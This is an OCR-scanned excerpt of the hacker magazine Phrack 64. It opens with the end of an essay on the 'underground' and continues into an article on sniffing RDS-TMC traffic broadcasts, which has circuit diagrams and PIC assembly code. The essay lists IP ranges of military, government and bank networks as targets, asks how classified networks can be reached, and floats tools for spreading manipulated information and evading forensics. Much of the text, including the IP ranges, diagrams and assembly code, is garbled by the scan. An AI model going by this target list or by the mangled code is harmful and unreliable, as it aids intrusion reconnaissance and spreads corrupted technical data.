1404173400. — T40.273'255 4255 DARPA ISTO 

158:.-63::'02.:00 = 158263 s20 07/255 Defense Advanced Research Projects Agency 
14523 30%.0 -— 145.237.255.255 POLFIN ( Ministry of Finance Poland) 
163/130 £0). = 163%32.259.255 Ministry of Education Computer Center Taiwan 
1683.187.0 0° = 168.187.2552 255 Kuwait Ministry of Communications 
VET 6900S DT 9 259.2295 Ministry of Interior Hungary 
164.49.0.0 - 164.49.255.255 United States Army Space and Strategic 
Defense 

V6532740.0°= 165.272.255.255 United States Cellular Telephone 
152.152.0.0 - 152.152.255.255 : NATO Headquarters 

128.102.0.0 - 128.102.255.255 NASA 

128.149.0.0 - 128.149.255.255 NASA 

128.154.0.0 - 128.154.255.255 NASA 

12841554050 —-128:.195%.25594 255 NASA 

128.156.0.0 - 128.156.255.255 NASA 

128451574.0.0.— 128-5157..255.255 NASA 

128.158.0.0 - 128.158.255.255 NASA 

12:854.159..0..0 > 128.159.255.255 NASA 

128.161.0.0 —- 128.161.255.255 NASA 

128.183.0.0 - 128.183.255.255 NASA 

128.217.0.0 - 128.217.255.255 : NASA 

129:.50«0.0° =. 129.950.255.255 NASA 

19323130 +0)-> £53.31, 225921295. FBI Criminal Justice Information Systems 
133... 23-7 3.050 -— 138:3137 5.255.255 Navy Regional Data Automation Center 
138.141.0.0 - 138.141.255.255 Navy Regional Data Automation Center 
138.143.0.0 - 138.143.255.255 Navy Regional Data Automation Center 
161 ..1:04..0-20° = 161. 1042255::255 France Telecom R&D 

161.105.0.0 - 161.105.255.255 France Telecom R&D 

161°.10'6:.-0:2.0%-=> Lod).1 0622553255 France Telecom R&D 

V5 922112 0%0: = 159-22 1259 6205. Alcanet International (Alcatel) 
15:8s.190-.-0;.0" = 153.190..259..-2:55 Credit Agricole 

1581-91 .040.-— 158.191.255.255 Credit Agricole 

158.192.0.0 - 158.192.255.255 : Credit Agricole 

165.32.0.0 - 165.48.255.255 Bank of America 

171.128.0.0 - 171.206.255.255 Bank of America 

167.84.0.0 - 167.84.255.255 The Chase Manhattan Bank 

15:9%5.0)30'.:0)»-9 159.750. .25'5:, 2:95 Banque Nationale de Paris 

199% 22°..0 20> = D5 E2225 922 99 Swiss Federal Military Dept. 
1:63:;12'3:0).:0) — B63: 12, 255.255 navy aviation supply office 
1:63:/2497:-0%,0-— 163.249: 255-255 Commanding Officer Navy Ships Parts 
164.94.0.0 - 164.94.255.255 Navy Personnel Research 

164.224.0.0 - 164.224.255.255 Secretary of the Navy 

34.0000! = 34.25 5'3255.255 Halliburton Company 

13:93 E21 4:0%2 05 S713 9s 20 6259.62.55 Science Applications International 
Corporation 


The last one is definitely interesting; people interested by obscure 
technologies should investigate in-depth SAIC stuff... 


But anyway this list is rough and incomplete. We have a lot more 
interesting ranges but not yet classed. It’s just to show you how easy 
it is to obtain. 


If you think that the idea is funny, send us your range. We would be 
pleased to include your range in our list. The idea is to offer the more 
complete list we can for the next Phrack release. 


----[ 5.4. The axis of knowledge 

I’m sure that everyone knows "the axis of evil". This sensational 
expression was coined some years ago by Mr. Bush to group wicked 
countries (but was it really invented by the "president" or by mlst3r 
Karl Rove??). We could use the sam xpression to name the evil subjects 
that we would like to have in Phrack. But I will leave to Mr Powerful 
Bush his expression and find a more noble on The Axis of Knowledge. 
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So what is it about? Just list some topics that we would like to find 
more often in Phrack. In the past years, Phrack was mainly focused on 
exploitation, shellcode, kernel and revers ngineering. I’m not saying 
that this was not interesting, I’m saying that we need to diversify the 
articles of Phrack. Everyone agrees that we must know the advances in 
heap exploitation but we should also know how to exploit new technologies. 


=o = [ 5.4.1 New Technologies 
To illustrate my point, we can take a quote from Phrack 62, the 
profiling of Scut: 
Q: What suggestions do you have for Phrack? 
A: For the article topics, I personally would like to s more articles 


on upcoming technologies to exploit, such as SOAP, web services, 
-NET, etc. 


We think he was right. We need more article on upcoming technology. 
Hackers have to stay up to date. Low level hacking is interesting but we 
also need to adapt ourselves to new technologies. 


It could include: RFID, Web2, GPS, Galileo, GSM, UMTS, Grid Computing, 
Smartdust system. 


Also, since the name Phrack is a combination between Phreack and Hack, 
having more articles related to Phreacking would be great. If you have 
a look to all the Phrack issues from 1 to 30, the majority of articles 
talked about Phreacking. And Phreacking and new technologies are closely 
connected. 


------ [ 5.4.2 Hidden and private networks 


We would like to have a detailed or at least an introduction to 
private networks used by governments. It includes: 


* Cyber Security Knowledge Transfer Network (KTN) 
http://ktn.globalwatchonline.com 
p g 


* Unclassified but Sensitive Internet Protocol Router Network 
and 
The Secret IP Router Network (SIPRN) 
http://www.disa.mil/main/prodsol/data.html 


* GOVNET 
http://www.govnet.state.vt.us/ 


* Advanced Technology Demonstration Network 
http://www.atd.net/ 


* Global Information Grid (GIG) 
http://www.nsa.gov/ia/industry/gig.cfm?MenuID=10.3.2.2 


There are a lot private networks in the world and some are not 
documented. What we want to know is: how they are implemented, who 
is using them, which protocols are being used (is it ATM, SONET...?), 
is there a way to access them through the Internet, 


If you have any information to share on these networks, we would be 
very interested to hear from you. 
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SSS 4> [ 5.4.3 Information warfare 


Information warfare is probably one of the most interesting upcoming 
subjects in recent years. Information is present everywhere and the one 
who controls the information will be the master. USA already understands 
this well, China too, but some countries are still late. Especially in 
Europe. Some websites are already specialized in information warfare 
like IWS the Information Warfare Site (http://www.iwar.org.uk) 


You can also find some schools across the world which are specialized 
in information warfare. 


We, hackers, can use our knowledge and ingeniousness to do something 
in this domain. Let me give you two examples. The first one is Black Hat 
SEO (http://www.blackhatseo.com/). This subject is really interesting 
because it combines a lot of subjects like development, hacking, 

social engineering, linguistics, artificial intelligence and even 
marketing. These techniques can be use in Information Warfare and we 
would like the Underground to know more about this subject. 


Second example, in a document entitled "Who is n3td3v?" the author 
(hacker factor) use linguistic techniques in order to identify 
n3td3v. After having analyzed n3td3v’s text, the author claims that 
n3td3v and Gobbles are probably the same person. N3td3v’s answer was 
to say that he has an A.I. program allowing him to generate a text 
automatically. If he wants to sound like George Bush, he has simply 
to find a lots of articles by him, give these texts to his A.I. and 
the AI program will build a model representing the way that George 
Bush write. Once the model created, he can give a text to the A.I. 
and this text will be translated in "George Bush Speaking". Author’s 
answer (hacker factor) was to say it’s not possible. 


For working in text-mining, I can tell you that it’s possible. The 
majority of people working in the academic area are blind and when you 
come to them with innovative techniques, they generally say you that you 
are a dreamer. A simple implementation can be realized quickly with the 
use of a grammar (that you can even induct automatically), a thesaurus 
and markov chains. Add some home made rules and you can have a small 
system to modify a text. 


An idea could be to release a tool like this (the binary, not the 
source). I already have the title for an article : "Defeating forensic: 
how to cover your says" ! 


More generally, in information warfare, interesting subjects could be: 


* Innovative information retrieval techniques 
* Automatic diffusion of manipulated information 
* Tracking of manipulated information 


Military and advanced centers like DARPA are already interested in 
these topics. We don’t have to let governments have the monopoly on 
these areas. I’m sure we can do much better than governments. 


a a [ 5.4.4 Spying System 


Everyone knows ECHELON, it’s probably the most documented spying 
system in the world. Unfortunately, the majority of the information that 
you can find on ECHELON is where ECHELON bases in the world are. There is 
nothing about how they manipulate data. It’s evident that they are using 
some data-mining techniques like speech recognition, text-cleaning, topic 
classification, name entity recognition sentiment detection and so on. For 
this they could use their own software or maybe they are using some 
commercial software like: 


Retrievalware from Convera 
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http://www.convera.com/solutions/retrievalware/Default.aspx 


Inxight’s products: 
http://www.inxight.com/products/ 


"Minority Report" like system visualization: 
http://starlight.pnl.gov/ 


For now we are like Socrates, all we know is that we know nothing. 
Nothing about how they process data. But we are very interested to know. 


In the same vein, we would like to know more on Narus 
(http://www.narus.com/), which could be used as the successor of 
CARNIVORE which was the FBI’s tools to intercept electronic data. Which 
countries use Narus, where it is installed, how is Narus processing 
information... 


Actually any system which is supposed to spy on us is interesting. 


-—-[ 6. Conclusion 


I’m reaching the end of my subject. Like with every articles some 
people will agree with the content and some not. I’m probably not the best 
person for talking about the Underground but I tried to resume in 
this text all the interesting discussions I had for several years with a 
lot of people. I tried to analyze the past and present scene and to give 
you a snapshot as accurate as possible. 


I’m not entirely satisfied, there’s a lot more to say. But if this 
article can already make you thinking about the current scene or 
the Underground in general, that means that we are on the good way. 


The most important thing to retain is the need to get back the 
Underground spirit. The world changes, people change, the security world 
changes but the Underground has to keep its spirit, the spirit which 
characterized it in the past. 


I gave you some ideas about how we could do it, but there are much 
more ideas in 10000 heads than in one. Anyone who worry about the current 
scene is invited to give his opinion about how we could do it. 


So let’s go for the wakeup of the Underground. THE wakeup. A wakeup 
to show to the world that the Underground is not dead. That it will never 
die, that it is still alive and for a long time. 


Thats the responsibility of all hackers around the world. 
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(e*) Phrack #64 file 5 (eR) 


Hijacking RDS-IMC Traffic Information 
signals 


by Andrea "lcars" Barisani 
<lcars@inversepath. com> 


Daniele "danbia" Bianco 
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--[{ 1. Introduction 


Modern Satellite Navigation systems use a recently developed standard 
called RDS-TMC (Radio Data System - Traffic Message Channel) for receiving 
traffic information over FM broadcast. The protocol allows communication of 
traffic events such as accidents and queues. If information affects the 
current route plotted by the user the information is used for calculating 
and suggesting detours and alternate routes. We are going to show how to 
receive and decode RDS-TMC packets using cheap homemade hardware, the goal 
is understanding the protocol so that eventually we may show how trivial it 
is to inject false information. 


We also include the first release of our Simple RDS Decoder (srdsd is the 
lazy name) which as far as we know is the first open source tool available 
which tries to fully decode RDS-IMC messages. It’s not restricted to 
RDS-TMC since it also performs basic decoding of RDS messages. 


The second part of the article will cover transmission of RDS-TMC messages, 
satellite navigator hacking via TMC and its impact for social engineering 
attacks. 


--[ 2. Motivation 


RDS has primarily been used for displaying broadcasting station names on FM 
radios and give alternate frequencies, there has been little value other 
than pure research and fun in hijacking it to display custom messages. 


However, with the recent introduction of RDS-TMC throughout Europe we are 
seeing valuable data being transmitted over FM that actively affects SatNav 
operations and eventually the driver’s route choice. This can 
have very important social engineering consequences. Additionally, RDS-TMC 
messages can be an attack vector against SatNav parsing capabilities. 


Considering the increasing importance of these system’s role in car 

operation (which are no longer strictly limited to route plotting anymore) 
and their human interaction they represent an interesting target combined 
with the "cleartext" and un-authenticated nature of RDS/RDS-TMC messages. 


We’1l explore the security aspects in Part II. 
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The Radio Data System standard is widely adopted on pretty much every 
modern FM radio, 99.9% of all car FM radio models feature RDS nowadays. 
The standard is used for transmitting data over FM broadcasts and RDS-TMC 
is a subset of the type of messages it can handle. The RDS standard is 
described in the European Standard 50067. 


The most recognizable data transmitted over RDS is the station name which 
is often shown on your radio display, other information include alternate 
frequencies for the station (that can be tried when the signal is lost), 
descriptive information about the program type, traffic announcements (most 
radio can be set up to interrupt CD and/or tape playing and switch to radio 
when a traffic announcement is detected), time and date and many more 
including TMC messages. 


In a FM transmission the RDS signal is transmitted on a 57k subcarrier in 
order to separate the data channel from the Mono and/or Stereo audio. 


FM Spectrum: 


Mono Pilot Ton Stereo (L-R) RDS Signal 
PITT TEEPE tl PITT PTET EE PEEP PEt | | 
PETITE Err rt PITT PEEP EE PEEP PEt | | 
PETITE TEP E tl PITT PTET E rE PEEP EEE | | 
PETITE TEPEt PETITE TEEPE PEEP PEt || 
PETITE EEE Et | PETITE TEEPE oP EEEE EEG | | 
19k 23k 38k 53k 57k Freq (Hz) 


The RDS signal is sampled against a clock frequency of 1.11875 kHz, this 
means that the data rate is 1187.5 bit/s (with a maximum deviation of +/- 
0.125 bit/s). 

The wave amplitude is decoded in a binary representation so the actual data 
stream will be friendly ‘1’ and ‘0’. 


The RDS smallest "packet" is called a Block, 4 Blocks represent a Group. Each 
Block has 26 bits of information making a Group 104 bits large. 


Group structure (104 bits): 


| Block 1 | Block 2 | Block 3 | Block 4 | 


Block structure (26 bits): 


| Data (16 bits) | Checkword (10 bits) | 


The Checkword is a checksum included in every Block computed for error 
protection, the very nature of analog radio transmission introduces many 
errors in data streams. The algorithm used is fully specified in the 
standard and it doesn’t concern us for the moment. 


Here’s a representation of the most basic RDS Group: 


Block 1: 


PI code = 16 bits 
| PI code | Checkword | Checkword 10 bits 
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Block 2: Group code = 4 bits 
BO = 1 bit 
TP = 1 bit 
| Group code | BO | TP | PTY | <5 bits> | Checkword | PTY = 5 bits 
Checkword = 10 bits 
Block 3: 
Data = 16 bits 
| Data | Checkword | Checkword = 10 bits 
Block 4: 
Data = 16 bits 
| Data | Checkword | Checkword = 10 bits 


The PI code is the Programme Identification code, it identifies the radio 
station that’s transmitting the message. Every broadcaster has a unique 
assigned code. 


The Group code identifies the type of message being transmitted as RDS can 
be used for transmitting several different message formats. Type OA (00000) 
and OB (00001) for instance are used for tuning information. RDS-TMC 
m 
t 
a 


essages are transmitted in 8A (10000) groups. Depending on the Group type 
he remaining 5 bits of Block 2 and the Data part of Block 3 and Block 4 
re used according to the relevant Group specification. 


The ’BO’ bit is the version code, ’'0’ stands for RDS version A, ‘1’ stands 
for RDS version B. 


he TP bit stands for Traffic Programme and identifies if the station is 
capable of sending traffic announcements (in combination with the TA code 
present in OA, OB, 14B, 15B type messages), it has nothing to do with 
RDS-TMC and it refers to audio traffic announcements only. 


The PTY code is used for describing the Programme Type, for instance code 1 
(converted in decimal from its binary representation) is ’News’ while code 
4 is 'Sport’. 


--[ 4. RDS-TMC 


Traffic Message Channel packets carry information about traffic events, 
their location and the duration of the event. A number of lookup tables are 
being used to correlate event codes to their description and location 
codes to the GPS coordinates, those tables ar xpected to be present in 
our SatNav memory. The RDS-TMC standard is described in International 
Standard (ISO) 14819-1. 


All the most recent SatNav systems supports RDS-TMC to some degree, som 
systems requires purchase of an external antenna in order to correctly receive 
the signal, modern ones integrated in the car cockpit uses the existing FM 
antenna used by the radio system. The interface of the SatNav allows 

display of the list of received messages and prompts detours upon events 

that affect the current route. 


TMC packets are transmitted as type 8A (10000) Groups and they can be 
divided in two categories: Single Group messages and Multi Group messages. 
Single Group messages have bit number 13 of Block 2 set to '1’, Multi Group 
messages have bit number 13 of Block 2 set to ’0’. 


Here’s a Single Group RDS-TMC message: 


Block 1: 
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PI code 16 bits 
| PI code | Checkword | Checkword = 10 bits 
Block 2: Group code = 4 bits 
BO = 1 bit 
TP = 1 bit 
| Group code | BO | TP | PTY | T | F | DP | Checkword | PTY = 5 bits 
Checkword = 10 bits 
T= 1 bit DP = 3 bits 
F= 1 bit 
Block 3: D = 1 bit 
PN = 1 bit 
Extent = 3 bits 
| D | PN | Extent | Event | Checkword | Event = 11 bits 
Checkword = 10 bits 
Block 4: 
Location 16 bits 
| Location | Checkword | Checkword = 10 bits 


We can see the usual data which we already discussed for RDS as well as new 


information (the <5 bits> are now described). 

We already mentioned the ’F’ bit, it’s bit number 13 of Block 2 and it 
identifies the message as a Single Group (F = 1) or Multi Group (F = 0). 

The 'T’, ‘’F’ and ’D’ bits are used in Multi Group messages for identifying if 
this is the first group (TFD = 001) or a subsequent group (TFD = 000) in the 
stream. 

The ’DP’ bit stands for duration and persistence, it contains information 


about the timeframe of the traffic event so that the client can 
automatically flush old ones. 


The ’D’ bit tells the SatNav if diversion advice needs to be prompted or 
not 
The ’PN’ bit (Positive/Negative) indicates the direction of queue events, 


it’s opposite to the road direction sinc 


it represent the direction of the 


growth of a queue 


(or any directional event). 


he ’Extent’ data shows the extension of the current it is measured 


in terms of nearby Location Table entries. 


vent, 


The ’Event’ part contains the 11 bit Event code, which is looked up on the 
local Event Code table stored on the SatNav memory. The ’Location’ part 
contains the 16 bit Location code which is looked up against the Location 


some countries allow a 
Italy[1]). 


[Table database, also stored on your 
free download of the Location Table 


SatNav memory, 
database (like 


of two or more 
as speed limit 


Multi Group messages are a sequenc 
contain additional information such 
supplementary information. 


8A groups and can 
advices and 


--[ 5. Sniffing circuitry 


Sniffing RDS traffic basically requires thr components: 


1. FM radio with MPX output 
2. RDS signal demodulator 
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3. RDS protocol decoder 

The first element is a FM radio receiver capable of giving us a signal that 
has not already been demodulated in its different components since we need 
access to the RDS subcarrier (and an audio only output would do no good). 
his kind of "raw" signal is called MPX (Multiplex). The easiest way to get 
such signal is to buy a standard PCI Video card that carries a tuner 

which has a MPX pin that we can hook to. 


One of these tuners is Philips FM1216[2] (available in different 
"flavours", they all do the trick) which provides pin 25 for this purpose. 
It’s relatively easy to identify a PCI Video card that uses this tuner, we 
used the WinFast DV2000. An extensive database[3] is available. 


Once we get the MPX signal it can then be connect to a RDS signal 
demodulator which will perform the de-modulation and gives us parsable 
data. Our choice is ST Microelectronics TDA7330B[4], a commercially 
available chip used in most radio capable of RDS de-modulation. Another 
possibility could be the Philips SAA6579[5], it offers the same 
functionality of the TDA7330, pinning might differ. 


Finally we use custom PIC (Peripheral Interface Controller) for preparing 
and sending the information generated by the TDA7330 to something that we 
can understand and use, like a standard serial port. 


The PIC brings DATA, QUAL and CLOCK from demodulator and "creates" a 
stream good enough to be sent to the serial port. Our PIC uses only two 
pins of the serial port (RX - RTS), it prints out ascii ’0’ and ’1’ 
clocked at 19200 baud rate with one start bit and two stop bits, no parity 
bit is used. 


As you can see the PIC makes our life easier, in order to see the raw 
stream we only have to connect the circuit and attach a terminal to the 
serial port, no particular driver is needed. The PIC we use is a PIC 16F84, 
this microcontroller is cheap and easy to work with (its assembly has only 
35 instructions), furthermore a programmer for setting up the chip can be 
easily bought or assembled. If you want to build your own programmer a good 
choice would be uJDM[6], it’s one of the simplest PIC programmers available 
(it is a variation of the famous JDM programmer) . 


At last we need to convert signals from the PIC to RS232 compatible signal 
levels. This is needed because the PIC and other integrated circuits works 
under TTL (Transistor to Transistor Logic -— O0V/+5V), whereas serial port 
signal levels ar 12V/+12V. The easiest approach for converting the signal 
is using a Maxim RS-232[7]. It is a specialized driver and receiver 
integrated circuit used to convert between TTL logic levels and RS-232 
compatible signal levels. 


a 


Here’s the diagram of the setup: 


\ / 
\ / 
[ RDS - Demodulator ] 
*diagram* 
[ ] 
= ia =- 
es MU |= 
P |- 1N aS 
One 25 => 
ToS LR =— 
. 6 =, 1 — 20 
7 eo eae eters > MPX ---> MUXIN -|. U |- 
ae pin 25 = le 
s |- AF sound output =i T ['= 
7 | D | - 
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hg | —| A [= 
em | = 7 |- 
|- | -| 3. |= QUAL 
|- | —| 3 |- DATA 
|- | —| 0 |- CLOCK_ 
| | =: [= 
10 11 | 
V 
| 
| 
| 1 18 
V V X=-|s uv -— -> data out (to rs232) 
V | x - —' > Ftis -out (Cho. rs232) 
oe x 1 - <- osel / clkin 
| MCLR -> - 6 —- -> OSC2 / CLKOUT 
| Vss (gnd) -> - F -— <- Vdd (+5V) V 
| DATA -> —- 8 - x 
QUAL -> —- 4 =i 
CGLOGK =>: = p< 
xe Se 
9 10 
Serial Port 1 16 | 
(DB9 connector) sil ten 37. a * 
= fi | 
| RX - pin2 | - R - RTS _| 
Vv | - Ss - V 
| Oo. | | om 2 = 
Nae AOS / | - 3 eS 
SSS SSa55 | <- DATA - 2 =.= 
“ RTS - pin 7 = - 
| 8 9 


re’s the commented assembler code for our PIC: 


Copyright 2007 Andrea Barisani <lcars@inversepath.com> 
Daniele Bianco <danbia@inversepath.com> 


Permission to use, copy, modify, and distribute this software for any 
purpose with or without fee is hereby granted, provided that the above 
copyright notice and this permission notice appear in all copies. 


THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES 
WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF 
MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR 
ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR Y DAMAGES 
WwW 
A 
O 


AN 
HATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN 
CTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF 
R IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. 


Pin diagram: 


a 18 
Ko Sis U —- -> DATA out (to RS232) 
x 7 - -> RTS out (to RS232) 
x - 1 —- <- OSC1 / CLKIN 
MCLR -> - 6 - -> OSC2 / CLKOUT 
Vss (gnd) -> - F -— <- Vdd (+5V) 
DATA -> —- 8 - x 
QUAL -> - 4 - x 
CLOCK -> - - xX 
xX - - x 
9 10 


Connection description: 
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pin 4 : MCLR (it must be connected to Vdd through a resistor 
to prevent PIC reset - 10K is a good resistor) 
pin 5 : Vss (directly connected to gnd) 
pin 6 : DATA input (directly connected to RDS demodulator DATA out) 
pin 7 : QUAL input (directly connected to RDS demodulator QUAL out) 
pin 8 : CLOCK input (directly connected to RDS demodulator CLOCK out) 
pin 14: Vdd (directly connected to +5V) 
pin 15: OSC2 / CLKOUT (connected to an 2.4576 MHz oscillator crystal* ) 
pin 16: OSC1 / CLKIN (connected to an 2.4576 MHz oscillator crystal* ) 
pin 17: RTS output (RS232 - '’RTS’’ pin 7 on DBI connector** ) 
pin 18: DATA output (RS232 — '’RX’’ pin 2 on DB9Y connector** ) 
pin 1,2,3,9,10,11,12,13: unused 
*) 
We can connect the oscillator crystal to the PIC using this simple 
circuit: 
C1 (15-33 pF) 
| | OSC1 / CLKIN 
| | | | 
| —— 
gnd ---| = XTAL (2.4576 MHz) 
| ie 
| | | | 
| | OSC2 / CLKOUT 
C2 (15-33 pF) 
Lad) 
We have to convert signals TTL <-> RS232 before we send/receive them 
to/from the serial port. 
Serial terminal configuration: 
8-N-2 (8 data bits - No parity - 2 stop bits) 
HARDWARE CONF 
PROCESSOR 16f84 
RADIX DEC 
INCLUDE "ol6f84.inc" 
ERRORLEVEL —302 ; suppress warnings for bankl 
—_ CONFIG 1111111110001b ; Code Protection disabled 
; Power Up Timer enabled 
; WatchDog Timer disabled 
; Oscillator type XT 
DEFINE 
define BankO bef STATUS, RPO ; activates bank 0 
define Bank1 bsf STATUS, RPO ; activates bank 1 
define Send_0O bcf PORTA, 1 ; send 0 to RS232 RX 
define Send_l bsf PORTA, 1 ; send 1 to RS232 RX 
define Skip_if_C btfss STATUS, C ; skip if C FLAG is set 
define RTS PORTA, O ; RTS pin RAO 
#define RX PORTA, 1 ; RX pin RAL 
define DATA PORTB, 0 ; DATA pin RBO 
define QUAL PORTB, 1 ; QUAL pin RB1 
define CLOCK PORTB, 2 ; CLOCK pin RB2 
RS232_data equ OxO0C ; char to transmit to RS232 
BIT_counter equ OxOD ; n. of bits to transmit to RS232 


RAW_data equ OxOE ; RAW data (from RDS demodulator) 
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dummy_counter equ 


1’ 


7 BEGIN PROGRAM COD 


ORG 


InitPort 


Bank1l 


movilw 


btfsc 
goto 


movftw 
andlw 
movwft 
call 


btfss 
goto 


goto 
RS232_Tx 


btfsc 
goto 
goto 


Good_qual 
movilw 
andwf 
iorlw 
movwft 
goto 


Bad_qual 
movilw 
andwf 
iorlw 


movwt 


Ghar. Tx 


movilw 


Send_loop 


decfsz 
goto 


13 | 


000h 


00000000b 
TRISA 


00000111b 
TRISB 


00000010b 
PORTA 


CLOCK 
Main 


PORTB 
00000011b 
RAW_data 
RS232_Tx 


CLOCK 
S-1 


Main 


RAW_data,1 
Good_qual 
Bad_qual 


00000001b 
RAW_data,w 
FOr 
RS232_data 
Char_Tx 


00000001b 
RAW_data,w 


nxt 


RS232_data 


9 


BIT_counter 


StartBit 


BIT_counter, 
Send_data_bit 


8 


dummy counter... used for delays 


select bank 1 


RAO-RA4 output 


RBO-RB2 input / RB3-RB7 output 


select bank 0 


set voltage at -12V to RS232 '’’Rx’’ 


wait for clock edge (high -> low) 


reads levels on PORTB and send 
data to RS232 


wait for clock edge (low -> high) 


RS232 (19200 baud rate) 8-N-2 
1 start+8 datat+t2 stop - No parity 


good quality signal 
sends ’0’ or ‘1’ to RS232 


bad quality signal 
sends ’*’ or ‘’+’ to RS232 


(8 bits to transmit) 
BIT_counter =n. bits + 1 


sends start bit 


sends all data bits contained in 
RS232_data 
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call StopBit ; sends 2 stop bit and returns to Main 


Send_1l 
goto Delayl6 


StartBit 


Send_0 

nop 

nop 

goto Delayl6 


StopBit 


nop 
nop 
nop 
nop 
nop 


Send_l 
call Delay8 
goto Delayl6 


Send_0O_ 


Send_0 
goto Delayl6 


Send_1l_ 


nop 
Send_1l 
goto Delayl6 


Send_data_bit 


ert RS232_ data, f ; result of rotation is saved in 
Skip_if_c ; C FLAG, so skip if FLAG is set 
goto Send_zero 


Call: Send_l_ 
goto Send_loop 


Send_zero 


call Send_0_ 
goto Send_loop 


7; 4 / clock = '’normal’’ instruction period (1 machine cycle ) 
; 8 / clock = '’branch’’ instruction period (2 machine cycles) 
’ 
‘ clock normal instr. branch instr. 
: 2.4576 MHz 1.6276 us 3.22552) us 
7 
Delayl6 
movlw 2 ; Gummy cycle, 
movwf dummy_counter 7 used only to get correct delay 
; for timing. 
decfsz dummy_counter,f ; 
goto S$-1 ; Total delay: 8 machine cycles 
nop ye iG. 1 1+ 2 +2 + 71 8 ) 
Delay8 
movlw 2 ; Gummy cycle, 
movwf dummy_counter 7 used only to get correct delay 
; for timing. 
decfsz dummy_counter,f : 
goto S-1 ; Total delay: 7 machine cycles 


Poot We eT a2 ier) 


Delayl 
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RETURN ; unique return point 


eg 
za 
oO 


7 END PROGRAM COD 


Gl 


</code> 


Using the circuit we assembled we can "sniff" RDS traffic directly on the 
serial port using screen, minicom or whatever terminal app you like. 

You should configure your terminal before attaching it to the serial port, 
the settings are 19200 baud rate, 8 data bits, 2 stop bits, no parity. 


# stty -F /dev/ttyS0O 19200 cs8 cstopb -parenb 
speed 19200 baud; rows 0; columns 0; line = 0; intr = *C; quit = %\; 


erase = *?; kill = *H; eof = *D; eol = <undef>; eol2 = <undef>; 
swtch = <undef>; start = *Q; stop = *S; susp = *Z; rprnt = “R; 
werase = “W; lInext = *V; flush = *0O; min = 100; tim 2; ~-parenb -parodd 


cs8 -hupcl cstopb cread clocal crtscts -ignbrk brkint ignpar -parmrk -inpck 
-istrip -inlcr -igncr -icrnl -ixon -ixoff -iuclc -ixany -imaxbel -iutf8 
-opost -olcuc -ocrnl -onlcr -onocr -onlret -ofill -ofdel nl0O cr0 tab0O bs0O 
vt0O ££0 -isig -icanon iexten cho echo chok chonl -noflsh -xcase 
-tostop -echoprt echoctl echoke 


# screen /dev/ttyS0O 19200 
1010100100001100000000101000%*000101001411101111011111111110000001011011100 
10101001++000001100101100%*110100101001000011000000111010000100101001111111 
0011101100010011000100000+000000000 ... <and so on> 


As you can see we get ’0’ and ‘1’ as well as ’*’ and ’+’, this is because 
the circuit estimates the quality of the signal. ’*’ and ’+’ are bad 
quality ’0’ and ’1’ data. We ignore bad data and only accept good quality. 
Bad quality data should be ignored, and if you see a relevant amount of ’*’ 
and ’+’ in your stream verify the tuner settings. 


n order to identify the beginning of an RDS message and find the right 
ffset we "lock" against the PI code, which is present at the beginning of 
very RDS group. PI codes for every FM radio station are publicly available 
n the Internet, if you know the frequency you are listening to then you 

an figure out the PI code and look for it. If you have no clue about what 
he PI code might be a way for finding it out is seeking the most recurring 
16 bit string, which is likely to be the PI code. 


tQ 0008 


Here’s a single raw RDS Group with PI 5401 (hexadecimal conversion of 
101010000000001) : 


0101010000000001111101100100000100001010001100101100000000100001010000001100100101001001000 


0010001101110 


Let’s separate the different sections: 


Checkword 


0101010000000001 1111011001 0000 01 0 0001 01000 1100101100 0000001000010100 000011001 
0 0101001001000001 0001101110 
PI code Checkword Group BO TP PTY <5 bits> Checkword Data 

Data Checkword 


So we can isolate and identify RDS messages, now you can either parse them 
visually by reading the specs (not a very scalable way we might say) or use 
a tool like our Simple RDS Decoder. 


--[ 10. Simple RDS Decoder 0.1 


The tool parses basic RDS messages and OA Group (more Group decoding will 
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be implemented in future versions) and performs full decoding of Single 
group RDS-TMC messages (Multi Group support is also planned for future 
releases). 


Here’s the basic usage: 


# ./srdsd -h 


Simple RDS-TMC Decoder 0.1 || http://dev.inversepath.com/rds 
Copyright 2007 Andrea Barisani || <andrea@inversepath.com> 
Usage: ./srdsd.pl [-h|-H|-P|-t] [-d <location db path>] [-p <PI number>] <input file> 
-t display only tmc packets 
-H HTML output (outputs to /tmp/rds-*.html1) 
-p PI number 
—-P PI search 
-d location db path 
-h this help 


Note: -d option expects a DAT Location Table code according to TMCF-LT-EF-MFF-v06 
standard (2005/05/11) 


As we mentioned the first step is finding the PI for your RDS stream, if you 
don’t know it already you can use ’-P’ option: 


# ./srdsd -P rds_dump.raw | tail 
0010000110000000: 4140 (2180) 
1000011000000001: 4146 (8601) 
0001100000000101: 4158 (1805) 
1001000011000000: 4160 (90c0) 
0000110000000010: 4163 (0c02) 
0110000000010100: 4163 (6014) 
0011000000001010: 4164 (300a) 
0100100001100000: 4167 (4860) 
1010010000110000: 4172 (a430) 
0101001000011000: 4185 (5218) 


Here 5218 looks like a reasonable candidate being the most recurrent 
string. Let’s try it: 


# ./srdsd -p 5218 -d ~/loc_db/ rds_dump.raw 


Reading TMC Location Table at ~/loc_db/: 
parsing NAMES: 13135 entries 
parsing ROADS: 1011 entries 
parsing SEGMENTS: 15 entries 
parsing POINTS: 12501 entries 


done. 


Got RDS message (frame 1) 
Programme Identification: 0101001000011000 (5218) 


Group type code/version: 0000/0 (OA - Tuning) 
Traffic Program: 1 
Programme Type: 01001 (9 Varied Speech) 


Block 2: 01110 
Block 3: 1111100000010110 
Block 4: 0011000000110010 
Decoded OA group: 
Traffic Announcement: 0 
Music Speech switch: 0 
Decoder Identification control: 110 (Artificial Head / PS char 5,6) 
Alternative Frequencies: 11111000, 00010110 (112.3, 89.7) 
Programme Service name: 0011000000110010 (02) 
Collected PSN: 02 


Got RDS message (frame 76) 
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Programme Identification: 0101001000011000 (5218) 


Group type code/version: 1000/0 (8A - TMC) 
Traffic Program: 1 
Programme Type: 01001 (9 Varied Speech) 


Block 2: 01000 
Block 3: 0101100001110011 
Block 4: 0000110000001100 
Decoded 8A group: 
Bit X4: 0 (User message) 
Bit X3: 1 (Single-group message) 
